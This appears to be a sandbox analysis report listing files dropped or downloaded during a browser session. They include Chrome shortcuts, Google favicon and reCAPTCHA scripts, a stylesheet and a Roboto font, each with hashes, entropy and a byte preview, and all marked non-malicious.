                                                                                                                                                            Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ITX.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VTX.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VTX.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VTX............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............qP.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 20 21:46:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2681
                                                                                                                                                            Entropy (8bit):3.9954865706237817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8HbdsTQA1HridAKZdA1vehDiZUkwqehZy+R:8HunCny
                                                                                                                                                            MD5:68E68AEA82F9516032D726006D9CBDB3
                                                                                                                                                            SHA1:C8CE53E7EBD02314588865923C23895072A3F358
                                                                                                                                                            SHA-256:7D5D8F3BC9B9BF0BCA6AFCA3F34ED0F10397AC68C0276EF229E977BE63C4612E
                                                                                                                                                            SHA-512:B8DA7EA3CF1932A07C7F426B078E48F47FA15C7E4FF818D057F40B01B46BB7B1C946ADD9AF07618796E02B5A2444E97D043CBD03D7C9B9517F7F98BCBD69D576
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.@.. ...$+.,........Nd..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ITX.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VTX.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VTX.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VTX............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VTX............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............qP.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 20 21:46:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2681
                                                                                                                                                            Entropy (8bit):3.9829346498419604
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8RdsTQA1HridAKZdA1hehBiZUk1W1qehry+C:8wny9Ly
                                                                                                                                                            MD5:8278B769CFC537CD2B6B5CB9282FDE4B
                                                                                                                                                            SHA1:2AB0CD67881331728E0CAA2889E1B9BA072DA673
                                                                                                                                                            SHA-256:024E7C080159938BADB2CCBF4CC59F5F6AE24911C9BAFEEA6D199FFE22288429
                                                                                                                                                            SHA-512:A75D94F1142517E89F4DC8C754D42A3F4CD9589B688BB58245F7E8870BFD335EAAA3EF3C3DA47236D466226C8551A4299BAF46D01780975B6A790B45B29AD8C2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.@.. ...$+.,........Nd..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ITX.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VTX.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VTX.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VTX............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VTX............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............qP.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 20 21:46:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2683
                                                                                                                                                            Entropy (8bit):3.992683715404562
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:8xdsTQA1HridAKZdA1duT+ehOuTbbiZUk5OjqehOuTbhy+yT+:8QnsT/TbxWOvTbhy7T
                                                                                                                                                            MD5:1D41C8ADF08023B985E732F4B9A62572
                                                                                                                                                            SHA1:7A18FFA36AC396A79C8BACF5B3FC650BE8BCDF15
                                                                                                                                                            SHA-256:03EC001CB552E8B5A29CB45E1CB4F07777758AA8D6DE7682F6F92C9A69E0054F
                                                                                                                                                            SHA-512:5D92281127D8A298F9C04718C230998CDAAD31AD379DDDE4D1285AA1669AC29F4AF0FA975AE5838D6951BBED5B342AA47C8CF7D9C450440B2A3061856FFBD98A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:L..................F.@.. ...$+.,...../..Nd..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ITX.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VTX.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VTX.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VTX............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VTX............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............qP.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):55
                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):5430
                                                                                                                                                            Entropy (8bit):3.6534652184263736
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                            MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                            SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                            SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                            SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://www.google.com/favicon.ico
                                                                                                                                                            Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (17265), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):17265
                                                                                                                                                            Entropy (8bit):5.6124843571072995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:ENmDG2zKGE2+YnVQ7gKMIwu5VIc9g4a/rEJjpWn8Cw:5JzpE2EpMIV/K4WE9Gw
                                                                                                                                                            MD5:5B536CDBB5025EE82FE0782ECB4568C6
                                                                                                                                                            SHA1:23350D4CA27A454209C870288D91008AB5782B1B
                                                                                                                                                            SHA-256:CF2BC8471CA9269F57B173FB6C5AD405DF0963FCC24AEDB26BE6E495D94C4E4F
                                                                                                                                                            SHA-512:418FE0EF4557DBFD56F176270D35E94CB1161690F0592D52A944501D1A48D1867DC25AD0DECF841FE9F3D8C4538447D982F24EDD5A0018A64DF724BB18643B92
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://www.google.com/js/bg/zyvIRxypJp9XsXP7bFrUBd8JY_zCSu2ya-bkldlMTk8.js
                                                                                                                                                            Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var B=function(d){return d},X=this||self,J=function(d,z){if(z=(d=X.trustedTypes,null),!d||!d.createPolicy)return z;try{z=d.createPolicy("bg",{createHTML:B,createScript:B,createScriptURL:B})}catch(I){X.console&&X.console.error(I.message)}return z};(0,eval)(function(d,z){return(z=J())&&1===d.eval(z.createScript("1"))?function(I){return z.createScript(I)}:function(I){return""+I}}(X)(Array(7824*Math.random()|0).join("\n")+'(function(){var zN=function(d,z,X,I,V,a){for(V=(I=(X=(z=m((a=d[da]||{},d)),a.wk=m(d),a.N=[],d.T==d?(b(d)|0)-1:1),m(d)),0);V<X;V++)a.N.push(m(d));for(a.Je=f(d,z),a.es=f(d,I);X--;)a.N[X]=f(d,a.N[X]);return a},BO=function(d,z,X){return((X=Z[d.l](d.he),X)[d.l]=function(){return z},X).concat=function(I){z=I},X},iD=function(d,z,X){if("object"==(X=typeof d,X))if(d){if(d instanceof Array)return"array";if(d instanceof Object)return X;if("[object Window]"==(z=Object.prototype.toSt
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5430
                                                                                                                                                            Entropy (8bit):3.6534652184263736
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                            MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                            SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                            SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                            SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1222), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1222
                                                                                                                                                            Entropy (8bit):5.834072124457519
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2jkm94/zKPccAv+KVCLTLv138EgFB5vtTGJTlWtqn1/I8AsLqo40RWUnYN:VKEctKonR3evtTA8En1/3BLrwUnG
                                                                                                                                                            MD5:4AC49175C314DF12EC34B4146B36237C
                                                                                                                                                            SHA1:308CBE54E95BF0A3B42C122CA66A720C558B4DAF
                                                                                                                                                            SHA-256:0CA481C23EC930C9DBC8259D22182E5F93730186A236BAA8D6A3DD2CC7A41DA6
                                                                                                                                                            SHA-512:9C44831DD3D04F773628D7FDD559B58C74EDCDFC32AB5FEA326494A58910017DA1C55FC526AE6A41AD20EBF7FDF05DA634759FE2F212B3C49AAD004337931C95
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://www.google.com/recaptcha/api.js
                                                                                                                                                            Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-7+IRLxkl1z6qr/oVEzkUcOT7nJWJEREgLpBaZWNu
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2228
                                                                                                                                                            Entropy (8bit):7.82817506159911
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2228
                                                                                                                                                            Entropy (8bit):7.82817506159911
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (56398), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):56398
                                                                                                                                                            Entropy (8bit):5.907604034780877
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:+LUmmAWTe2uXYp8Mi+yKYlebyB5lxRx54PHSGdXXwW7MFWwXVuE2:4UcW6v+0B5chXwW49z2
                                                                                                                                                            MD5:EB4BC511F79F7A1573B45F5775B3A99B
                                                                                                                                                            SHA1:D910FB51AD7316AA54F055079374574698E74B35
                                                                                                                                                            SHA-256:7859A62E04B0ACB06516EB12454DE6673883ECFAEAED6C254659BCA7CD59C050
                                                                                                                                                            SHA-512:EC9BDF1C91B6262B183FD23F640EAC22016D1F42DB631380676ED34B962E01BADDA91F9CBDFA189B42FE3182A992F1B95A7353AF41E41B2D6E1DAB17E87637A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css
                                                                                                                                                            Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAAACXZwQWcAAABUAAADSAC4K4y8AAA4oElEQVR42u2dCZRV1ZX3q5iE4IQIiKQQCKBt0JLEIUZwCCk7pBNFiRMajZrIl9aOLZ8sY4CWdkDbT2McooaAEmNixFhpaYE2dCiLScWiQHCgoGQoGQuhGArKKl7V+c5/n33fO/V4w733nVuheXuv9V/rrnvP2Xud3zvTPee+ewsKxMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExP4OdtlT6ztAbRWvvLy8A3QkwxzH6tBGMMexI
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):102
                                                                                                                                                            Entropy (8bit):4.989054234716049
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:JSbMqSL1cdXWKQK43xrcphyAeWaee:PLKdXNQKqAeL
                                                                                                                                                            MD5:1167D6356DB396071EE04367695481DB
                                                                                                                                                            SHA1:BAAC3F93333B125BDAAE6945D12501BD2331699D
                                                                                                                                                            SHA-256:7D4765F9E5EF9C44C30128CF2055EA61529F0C9FDF121B4DDCA394DA954D82DF
                                                                                                                                                            SHA-512:A601002BBFD89C96CDFB1B3D4CDC01586953E19E497BDE8C11B186F92052FD7373CBCA794109F64F944EE079CE99F15DA607BBE5B9A3243C5D14A97D1C1E86CA
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA
                                                                                                                                                            Preview:importScripts('https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js');
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):15344
                                                                                                                                                            Entropy (8bit):7.984625225844861
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                            MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                            SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                            SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                            SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                            Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (733)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):499483
                                                                                                                                                            Entropy (8bit):5.689959239730183
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:NvawYKfp4y5Wivn2HgBwIwhl998Ep6rihru6tbOq8hSlmYNuxF:tawL4y5lGn/8Ep4/UOLhobc
                                                                                                                                                            MD5:C37774BE5504A3A7DEF09EFF73263BC3
                                                                                                                                                            SHA1:C5160A2908B3FD4230ED5CF521728FABAF3B5C06
                                                                                                                                                            SHA-256:4FD66999FB60AD3289DFAEE132FF52C0B1ECBA71661E4CBFE47D09AC4F1CD5A1
                                                                                                                                                            SHA-512:0B6BD8B8BA94B177597517B641FADE09F843F22C3F02D9B1BA6440A19ACACAA598AECA3C2315D106D560E78837E1E9FA74111856D52F40CA9A7865D4F4EEC9C3
                                                                                                                                                            Malicious:false
                                                                                                                                                            URL:https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js
